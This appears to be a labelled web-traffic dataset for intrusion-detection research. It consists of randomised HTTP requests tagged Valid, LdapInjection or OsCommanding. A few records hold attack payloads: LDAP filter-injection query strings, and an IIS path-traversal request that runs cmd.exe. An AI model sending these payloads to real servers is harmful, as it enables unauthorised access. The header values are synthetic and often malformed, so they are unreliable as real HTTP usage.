Host: 66.218.137.245
Connection: nlXstu
Accept: audio/*, image/gif
Accept-Charset: *
Accept-Encoding: deflate, compress, identity;q=0.1
Accept-Language: erz7-t;q=0.8, e-u0bojsaa, 0un5vbbu-i5, pnhtlori-s8Uo
Cache-Control: max-stale=159
Client-ip: 226.163.167.76
Cookie: dobdiuhuham=11eacxxp4;eA5io=oUypbGUQqJ5;ipnTag3s0=sjcY;WNdtZ=r_awIqSuH8-;1jaopLsvWsEsG=%ha1ibgsound:6t$S;0zm0=ee5 ]&/t?EwA$ ty0
Cookie2: $Version="633"
Date: Fri, 02 Jun 06 16:02:47 CET
ETag: "uBrX2tCovUdEGKdgZkT"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 05 Sep 04 01:32:36 UTC
If-Unmodified-Since: Mon, 11 Feb 08 02:53:23 GMT
If-Match: "LtcuKYm7fV9WbEX7Rj"
If-None-Match: *
If-Range: "2ccNAKqWfwviUUq6r"
Max-Forwards: 49
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: NTLM bmFpdGFUcGwzYWJveXROZHVUY3RuYXAyd255Z3pBc29p
Range: 642-53334
Referer: http://nAxeWtan.org/ssxt9.asp
TE: chunked,chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: rtsm/8.3
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: 2.7 www.a5oM5.png, 3.0 www.SOoisn.jpg, eoirw/9.2 132.221.91.26:8
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47233
Start - Id: 11517
class: Valid
GET /qtossotgDcott75louse/wherev38input/_0YsOQOHaR/hcnfeotnpaebte/eAD3_AC1dtw.VkSLPaEt/uieemegehhiutf2/sgO.html?xpcFnIhttp9W=+myobject&dhliit=%40b8trk4T&do=339588&sne=tkxiVNxLK&wdleRsmcoo=ty&4snuTtv4zn=t%40-uk&fUfnreizkyir=287&tx1vc6aeIaqtsf=2&oltcEno=529921&1n=ra6lyssm&vYeml=vtToenlcI%25a&djetsrepxsEr=8e%7Ercpf&urgmiNa=mrsiigguoicpgDlrea&dteoiy=%3C&Ls4irr8xtua7s=7429270649 HTTP/1.1
Host: www.P0lTfadfo.biz:80
Connection: atey
Accept: audio/x-wav, application/rtf
Accept-Charset: x-mac-cyrillic;q=0.6, windows-1253;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=0505
Client-ip: 15.47.59.132
Cookie: EJE8KGcOwHw-=nV6mJ5;nnvatN75Ctefln=eHTLfsd perl;asnp05ec=eo;-jP0CMY=a otsuh~-lo snm;i0is3hOeersont=o2erQV
Cookie2: $Version="884"
Date: Thu, 25 May 06 02:19:16 UTC
ETag: W/"YVB58SHl8HuMD@j"
Expect: dls38nt
From: neNEEo@hnaT.biz
If-Modified-Since: Mon, 29 Nov 04 11:32:05 UTC
If-Unmodified-Since: Mon, 19 Jul 04 17:54:34 UTC
If-Match: *
If-None-Match: "VTAcq-5gOQLcUaiuw"
If-Range: "St5YG9GgWL3uJ3anL1Hq"
Max-Forwards: 001
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Basic bW9ycGQ6c0U1NnQ=
Range: 778354-142629
Referer: /talw7nT.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: 3CutMnp http://www.utUnd.org
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9366x217
Via: 8.4 www.niadO.jpeg, dntT/8.9 182.45.75.158
Transfer-Encoding: identity
Upgrade: aka/7.7, e8rTee/4.0, 0ubLe/5.1, tnoOo/9.0
Warning: 522 152.136.158.58 "nxxntaane3s" "Sat, 03 Sep 05 20:12:16 GMT"
X-Forwarded-For: 9.122.243.64
X-Serial-Number: 4914032187639175
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 11517
Start - Id: 18128
class: Valid
GET /lAmaEtheh83ei2gas/rO55aso4/F5u/rIX6-zwbMlun631Bz2/AtacaEefiny/ab2xbKS/hAc/ooqetaeiraonanxdpd2/cpH-TVpsdj-Luhi1/rsrneam.jpg?puamEmyiu=C4ab&nw7woaosn=doeaptne8da&x90RVb=786356&sstsiuaasgo9Ya=enpositionleohY4oiaicgmochatheu&3lL3luSax0Lin=4819179&ePeTeea0sl=e4rNu9hZ&wl=rtnedxzf%2Ft+5y&Lm36iliu=oT8-%3Dbsxmlm+ekd&vtnoq=lGlG4wWM&eks=76385860&Awn=se2aewbl0ao&ctue5Rnsnrdaet=aL9n8dk82y&reTO=ig HTTP/1.0
Host: 17.172.207.24
Connection: posw
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.113.167.199
Cookie: 0Ttro=e:w;qicoeTi=@styleas3Tfdi?ooynDrsn:;pmwU1Toa2R=839;eltDcmo=8 a;ooer=tarGWpss;EQ7usrq=hc6t9
Cookie2: $Version="10"
Date: Sun, 03 Aug 08 10:06:07 CET
ETag: W/"rhcS_4hO9_XEsNz8dd"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Thu, 18 May 06 14:55:22 CET
If-Unmodified-Since: Sun, 05 Jul 09 04:40:34 GMT
If-Match: *
If-None-Match: "2s4ZMmM-ATXHCMGUXQ"
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 1
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: iisE najhde=go0akSs
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: http://www.sris.biz/aFonaf.swf
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 0.8; i6-ei; rv:3.9.7) Gecko/87679525
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: 5.5 www.sbfeoee.tiff, 5.4 185.137.71.2, 6.7 255.110.45.83
Transfer-Encoding: gzip
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18128
Start - Id: 28248
class: Valid
GET /NelUsidcE4hznOsgn/o-LUB/fd3ixWrehe1Teseae/R21WvvbscripttmpeMUvgG/bPLjRo3ifNw/oW4L8CgpufJ._pZ8Gkj/uWDczcHy81ciJ/.WHGOpwechor1Dho/eeucfr/enes0n33iOeoseent6.shtml?yamm=heh%40b&nogtnomr5usuye=tanosmeOpaE&irkm=888993971&hesdpeChYha=uprocessing-instruction7h&Nz=rHtxgkl9ovre1qHoIo&R.RpassthruA=eIotgrtbl&jhXf=wTec3aoq&iay=5140&Sd7enAAhaisndga=%7COae39ea&1Nn@5IKservices=586912&eas3=2&aeihaizce4=un&uh=nmNqk&xjrcheontt=Ae%3DhdnNg HTTP/1.1
Host: www.E21ep.fr
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.0, iso-8859-1;q=0.2, iso-8859-6;q=0.2
Accept-Encoding: gzip;q=0.2
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 141.31.102.223
Cookie: ohbdyesrruwr2=akdropmr
Cookie2: $Version="335"
Date: Sun, 19 Apr 09 06:46:38 UTC
ETag: W/"h5RyVwb5Q-2_w1WV@d6F"
Expect: ibTp1t=svzsd
From: e7ne1tE@sl9o.st
If-Modified-Since: Fri, 15 Jun 07 17:24:27 CET
If-Unmodified-Since: Fri, 01 Jun 07 06:11:36 UTC
If-Match: *
If-None-Match: *
If-Range: "fNMZG7UoN8N0Ft-QaoNT"
Max-Forwards: 6811
MIME-Version: 8.6
Pragma: nHd='tiDeant'
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: arsc2 p0nm=issr
Range: 29956-,-15205
Referer: http://sm5etm0.uk/iadri/ei6th/gmqrbd.gif
TE: trailers,deflate,chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 1.1; re-sr; rv:8.7.8) Gecko/79697328
UA-CPU: PowerPC
UA-Disp: 957,7809,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 096x863
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: identity
Upgrade: 0annoh/0.5, hzia/9.6
Warning: 303 www.wmahnr.css "dEhrH1lma7a" "Wed, 03 Mar 10 19:58:07 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 144317661774202
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28248
Start - Id: 17817
class: Valid
GET /eis4hg/0GmWRkWxM75U4/atjmdWhSdnsd/1ndniaSfsettlfn/oLKIC9j/hu@k_Hy3KLKSy5/hiweeotiei/easrdmrCu/ls9pTroese.mdb? HTTP/1.1
Host: 25.230.218.149
Connection: close
Accept: image/*;q=0.7
Accept-Charset: koi8-r, x-mac-chinesesimp;q=0.9
Accept-Encoding: *
Accept-Language: Eaa2hntE-hsfchlre, Haler7-h31e6e6;q=0.3
Cache-Control: min-fresh=6853
Client-ip: 13.232.29.60
Cookie: SnOeuy=a;ooevOtrmul9r=otrnke;fiatpw5fqro0=Davrbinftv
Cookie2: $Version="38"
Date: Sun, 20 Nov 05 12:30:55 UTC
ETag: W/"2p8s5H94J1S0AN5KQ"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Tue, 19 Apr 05 09:00:16 CET
If-Unmodified-Since: Mon, 26 Sep 05 06:24:04 CET
If-Match: *
If-None-Match: "uq9Yu5H@Gd9WWcVfaN"
If-Range: Sat, 16 Dec 06 13:26:18 CET
Max-Forwards: 67
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: 76827-723747,02-548
Referer: /xyaoIub/extrao/Lioe/rtiga.txt
TE: chunked;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/3.5 (Windows; U; Win98 0.8; ly-wg; rv:1.3.2) Gecko/95003409
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: 2.1 13.36.150.146
Transfer-Encoding: identity
Upgrade: 0e1dxo/9.3, 9olo/5.1
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17817
Start - Id: 38837
class: LdapInjection
GET /ueesyOewtniepn0sdo7l/zo99y-j_iw/kLd@gand5kgroup byii.asp?kc8UGj.b5=h%25n&Ey=n&nullnPMn=%29+++%28+%7C+%28++++cn%3D*o+++%27brien*+%29%28mail+%3D*o+%27brien*%29+++ HTTP/1.0
Host: www.anae2aF0t.biz:04
Connection: e5oxit
Accept: text/plain, audio/*
Accept-Charset: koi8-r, iso-8859-6;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: qe=wcx2
Client-ip: 109.34.220.88
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="62"
Date: Mon, 10 Nov 08 19:29:34 CET
ETag: W/"Pd2SaruN6n0VuUgvz"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Sun, 08 May 05 07:28:24 CET
If-Unmodified-Since: Thu, 18 Mar 04 04:46:33 UTC
If-Match: *
If-None-Match: *
If-Range: "4sgc7PzaIXD3Qy4z@Npk"
Max-Forwards: 92
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: oxtNc mgheq=svee9Num
Range: -83,96723-251385,-0483
Referer: /ctarz/riIleus/9yhg2n/eier.tar
TE: gzip,chunked;q=0.0,chunked
Trailer: User-Agent
User-Agent: sqte1xmSaC/8.6
UA-CPU: PowerPC
UA-Disp: 3032,6825,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: FTP/3.8 148.150.156.63, HTTP/6.3 111.10.246.166, necr/4.9 www.r8o1sf.htm
Transfer-Encoding: Eo5p; HcvteOsl=eaceet
Upgrade: tocy3/3.8
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38837
Start - Id: 19927
class: Valid
GET /f1aIsysrocc9/sQCSn6UilL7/cxIeFpM8.C/z0tnr/kprocessing-instructionC/tnnacerhc/nyMR-tS/tGvqkl2ngX1pcMXSr/tu/dHkPQOlDD.GnJC4@1MW/sr.mspx?9odrs5ibMk=bZu&velu=mwqnQ-nYc HTTP/1.0
Host: www.i6e7lTeT.org
Connection: sjqlJiA4
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Z='sN'
Client-ip: 127.60.59.43
Cookie: i6=grsmcied;lewe=qwinnt;ooxi5=esbhqqe<b;raemceeI7Ee=m
Cookie2: $Version="3"
Date: Sat, 10 Jun 06 18:59:40 UTC
ETag: W/"GwjE_hsac1rEPL1U@"
Expect: 0n0aoi=tottio
From: hneNgnvt@ijh5.org
If-Modified-Since: Thu, 20 Apr 06 12:21:51 UTC
If-Unmodified-Since: Mon, 27 Jun 05 14:54:13 CET
If-Match: *
If-None-Match: *
If-Range: "z1Q3S3DqPzj3cocxEg"
Max-Forwards: 8444
MIME-Version: 9.9
Pragma: bT8yI5nO=t2
Proxy-Authorization: Digest opaque="4aff8oo"
Authorization: ajtn8 2aaihhrD=0lsn
Range: -938127,36370-,-5
Referer: /gite.mpg
TE: trailers,deflate,deflate
Trailer: Via
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 2.5; va-is; rv:7.4.3) Gecko/12256784
UA-CPU: x86
UA-Disp: 611,1277,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 756x2638
Via: tfode0/3.4 153.36.41.210, 1.0 130.150.130.58
Transfer-Encoding: yc1ln; aciiog=rkfurs
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19927
Start - Id: 1574
class: Valid
GET /.ksZzWYshutdownifk/hOOphzTRE_Ss0Fn/udK9lw8P/5Mm/n2wdtt1z3/tDBaDIkuLu6IQsW8mNsS/c3I5IczoY/M6fBmrbhttpsY.mspx?NM3s=itragtme&evalhej7V=3351205&tlsdlugx6dn7sw=y&Eu=oselect+e HTTP/1.1
Host: 39.21.99.192
Connection: close
Accept: image/png;q=0.3, application/*, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.1, compress, compress, gzip;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 8.198.218.53
Cookie: 2oeyeni=8;emtnssnSn2alw=295207
Cookie2: $Version="4"
Date: Fri, 21 Aug 09 19:47:32 CET
ETag: W/"GCIpBDKeCjwWpDExWZ3"
Expect: 100-continue
From: tyoranj@tial.uk
If-Modified-Since: Sat, 14 Jun 08 21:36:33 GMT
If-Unmodified-Since: Fri, 09 Apr 10 15:16:21 GMT
If-Match: *
If-None-Match: "-Izw6FpiVojcNXfD"
If-Range: "VuYSBeOE2Z2d9s_mXvs"
Max-Forwards: 27
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: Basic ZWVjYXNueHc6Z3llc2Jyc2U=
Range: -7155,577-
Referer: http://innrrteu.gov/oldr5/hrdPs.jpeg
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: auaojs/7.6
UA-CPU: StrongARM
UA-Disp: 7507,6245,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: 8.4 41.131.132.227
Transfer-Encoding: odiis
Upgrade: ysw6sh/0.5
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 4623775518466698
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1574
Start - Id: 26966
class: Valid
GET /Cjl5ys5hcoremtc/vecedzlgsei9Te8E2/a1athSoosmsocu/tu/e61FEbAaL3Lx2/wevnazmee9re62Ph/tustmterssquso/esinrUthesEiPogebo/iAOTVmu2c4R.dll?auVkntnc=80731&sl8=9oDsorvarhm+6&MJOD=vi%7E&xGuTaTxwnfni=Epdiu3SnTupnw&iimr=3112&a3=oEh+o%25uCt3yt&o@jq3HJnodebincl=dfsrDouaHh8h&La=w+eo2ab%2Bctd6%29e&cbIhnedEmaAte=18039785 HTTP/1.1
Host: 213.97.245.156
Connection: aHen
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.0, utf-7;q=0.7, utf-8;q=0.0
Accept-Encoding: *
Accept-Language: yelos-aatei;q=0.3, eoaOsa-oari3ee, S-me;q=0.5
Cache-Control: max-age=0
Client-ip: 219.114.238.70
Cookie: etErc=aiwhE3lcatt;naBE=ye9ae;ts6fhfseedISet=somg tsrie
Cookie2: $Version="0"
Date: Tue, 07 Sep 04 21:23:33 GMT
ETag: "_CK1PuTGOUhbE4s87Nw9"
Expect: Hzpe
From: ttmky@IYeeg2.st
If-Modified-Since: Tue, 22 Jul 08 24:33:46 GMT
If-Unmodified-Since: Thu, 05 Oct 06 01:31:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 5.9
Pragma: ihunan5=h
Proxy-Authorization: Digest realm
Authorization: NTLM bjB0cmJxbklxZW90bXNjaTFoY2ltZWFvdGhsM2Vld1RvbGVjMmlvYm5lTg==
Range: 651009-95195,-8281,3059-2181
Referer: /eyhkas.tiff
TE: chunked,trailers,trailers
Trailer: Accept-Charset
User-Agent: afrhse
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6546x3443
Via: HTTP/6.8 www.n7Obagty.shtml
Transfer-Encoding: identity
Upgrade: vfUsoh/7.3
Warning: 935 107.30.102.137:83094 "ysEetlalo0ycm4el2rg" "Thu, 03 Aug 06 13:51:29 GMT"
X-Forwarded-For: 248.197.216.181
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26966
Start - Id: 7062
class: Valid
POST /vRsLp05LD@HtBR0fKs/ed2tfeaftu4/tmhr2ymescdL/gb/ufyfuaw/iPz1X/qANY/atpAqjuxBLUbpMN@u/3Xyfckg_/paVses3enm.php? HTTP/1.0
Content-Length: 158
Content-Language: r6Thne
Content-Encoding: identity
Content-Location: /ladmaN/gaTAbaqs/phEa/wlThdeA/Cwo0I7ss.php3
Content-MD5: aDZmZ2Fla3JvT2QwcmFiaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Mar 09 18:20:42 GMT
Last-Modified: Mon, 22 Jun 09 07:17:30 UTC
Host: 202.234.126.41
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 9.49.154.90
Cookie: araa=8541;ae=4;nhrcyPsaieesidT=ea5:%to;p6e5ircdi='bhi;OYals3=miannhaatm73ach;eLl=0884439317
Cookie2: $Version="0"
Date: Sun, 13 Dec 09 09:35:17 GMT
ETag: W/"zqSNf80KOhG4_gtigkN"
Expect: p1rcned
From: meebonii@Etgu.be
If-Modified-Since: Sun, 13 Apr 08 09:56:04 UTC
If-Unmodified-Since: Sat, 02 Apr 05 11:14:09 GMT
If-Match: "mY425zmYDRa-wTL54@."
If-None-Match: *
If-Range: "avgbZj_CLBThrGZcq49"
Max-Forwards: 3728
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic Y3VpcmF4OmFhYm1hbg==
Authorization: NTLM b2thdHRtanVlZVhjUzk2dWVwbXNlb2VlMWhlb2F1aW5FaXQ=
Range: 51061-93,46103-3,-27
Referer: http://www.o8iTs.org/bseic75/eemOalDf/jeur5S/sdTWs.msf
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 3.2; Ew-tD; rv:2.4.2) Gecko/98639622
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8498x1908
Via: md5es/7.5 www.lnelosn.js, 8.9 www.uc3hhsyu.png, FTP/2.6 130.218.201.239:50
Transfer-Encoding: deflate
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 300 www.4aei.js "Ajhoehebly" "Tue, 03 Nov 09 18:37:06 CET"
X-Forwarded-For: 243.127.72.185
X-Serial-Number: 916219
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mlmsl=q.pLqxrUGT@C&d9a7tmpheosam=8cad&mymrsoomeus9=k_Ll-.-M&bpispmet2=ttss&opt1zVUscript=aGBxjUcED93&yli=34521&oerhnh=afromYttrOl&iCrS6-VNBQRn=eltnv2wRueorw

End - Id: 7062
Start - Id: 23824
class: Valid
GET /edXmmXH3xGeLxsE1/orkHr6/lC2t6d7esw7exechgI/tieeXeubsz.htm?6ahee5artrxS2y=16&Og67mO=23049&aoatxD=reeob&QilopenHuR8F=ddo&i6dewtoqcercz=lE HTTP/1.0
Host: 172.173.238.167
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2;q=0.5, x-mac-ce, euc-tw
Accept-Encoding: gzip, compress, deflate
Accept-Language: 3sfcswnc-haeSjten, 3fen-dnraqA
Cache-Control: no-transform
Client-ip: 164.157.11.32
Cookie: m9o3ensrmaotly=eU2t9;etCeStaasfdslne=166;wlt=08;Hkrhhrismslg=6079
Cookie2: $Version="66"
Date: Tue, 16 Nov 04 15:41:40 CET
ETag: "uon7Mla_9dMErn7_oRF"
Expect: E4noAon=yehgmF;aais
From: dhmtihz@kNxat8.be
If-Modified-Since: Thu, 28 Feb 08 04:47:26 GMT
If-Unmodified-Since: Fri, 08 Dec 06 16:44:57 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Feb 07 09:01:43 UTC
Max-Forwards: 34
MIME-Version: 8.6
Pragma: r=tw9achs
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest algorithm=MD5-sess
Range: 484-,58283-,553-
Referer: /5wryen/Wb4tn1ed/stNhwmsa/pissotat.txt
TE: gzip;q=0.9,trailers,chunked
Trailer: Connection
User-Agent: A1iEth (tYnu-2sY.l)
UA-CPU: PowerPC
UA-Disp: 6328,311,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 646x2979
Via: s6rxz/9.3 233.191.88.226, 7.9 242.107.46.54:35, 8.2 www.trqleh.js
Transfer-Encoding: identity
Upgrade: oetsn/4.0, airn/8.5, saerkt/9.9
Warning: 415 104.244.65.136:24988 "egaakabiuCnNesrOeG" "Mon, 26 Oct 09 01:44:24 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23824
Start - Id: 43793
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 20.244.15.83:80
Connection: close
Accept: application/*, image/*;q=0.8, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, compress;q=0.0, gzip;q=0.6, gzip;q=0.3, deflate;q=0.6
Accept-Language: dtue-rFiyaa;q=0.2, nqca1-ei3te
Cache-Control: max-age=3
Client-ip: 50.135.195.138
Cookie: Fc=deoaiInInen;id0eedc9ltn73r=0999;erArrg=ady|4h iEe<Eiam te;rbe=aniDi9asqebws;esn9OpmrateuOt=4;eenoAu=86905
Cookie2: $Version="730"
Date: Fri, 23 Nov 07 16:26:15 UTC
ETag: W/"4KSEhJLGbnGFZx@@ZY"
Expect: eOrde=mEgiaao
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Sat, 30 May 09 06:14:35 CET
If-Match: "M6ub8I6lQ7Zz1jObxG@"
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 5947
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: nb3M te3kihhi=ocSushoi
Range: 904036-,02113-35,44499-
Referer: /nseH8/enGt/hCeI9/nianhrml/tgip.tar.gz
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 9.6; cr-7k; rv:8.5.3) Gecko/07053961
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: 0.9 www.ehn4el.shtml, 0.3 47.202.161.185, HTTP/0.1 192.73.163.75
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 417 136.188.100.128 "xNOs25" "Mon, 28 Aug 06 21:48:58 GMT"
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43793
Start - Id: 38490
class: LdapInjection
GET /nccod90McAvT/DqoptkEmM@ff/gfscoithalieWdyI/h.vhwwmG9osQnCv/xbodyZLFXqhtpassFetc.js?3hiI3to4=e6tmpltpce&yh6s=%29++++%28%7C++++%28displayName%3Dhad*%29++++%28name++%3D+had*+%29%28mail%3Dhad*++++%29 HTTP/1.0
Host: www.3tdetdssb.de:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 233.33.102.205
Cookie: a2noqlddganpoad=tcde2ilibrexrreplacei;6enc=35983;6vgwzQCGQJRa= og;httpsB7ds-49=0549960242;e4yyeorvb=xsl w2r5Elnw;n3np9pu58=0253
Cookie2: $Version="1"
Date: Thu, 08 Oct 09 04:28:06 CET
ETag: W/"ey0oseul4ln@JDqZ7P"
Expect: deissg=asa6
From: yowh@sjoa6l6daa.gov
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: "oN3pPVl02Tv3fR1R43bd"
If-None-Match: "e0zXWHps5LVgWjXu"
If-Range: Wed, 15 Jul 09 05:49:12 GMT
Max-Forwards: 5
MIME-Version: 9.7
Pragma: a=fs
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: 0-2571,265856-874172,-17957
Referer: http://wrs0qtds.de/netiiOqh/ermsYnl.asmx
TE: trailers
Trailer: Authorization
User-Agent: oOeea5o/3.9
UA-CPU: 68000
UA-Disp: 2438,693,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6621x951
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 748 218.206.210.84 "59neemNylty8eilereeP" "Tue, 26 Feb 08 18:29:12 UTC"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 8565701730547644653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38490
Start - Id: 14096
class: Valid
GET /shizSh.css?hfIv=38142&inhayWiHEydG=055&.Yzs0WL7O3A3=94121&thrwakatId=6includesock_streamY&egreve32mi=935467&Olrceh7s=a-3Iz6&1eo=epe&Hrhe8akoo9E7=evt1bqLikVvl&n3lluohim3nt4=%7Cia&xxbtnccy=2961 HTTP/1.0
Host: 215.158.68.176
Connection: keep-alive
Accept: application/*;q=0.8, audio/*, text/*
Accept-Charset: koi8-r;q=0.5, windows-1253;q=0.0, x-mac-japanese, x-mac-turkish, iso-10646-ucs-2;q=0.4
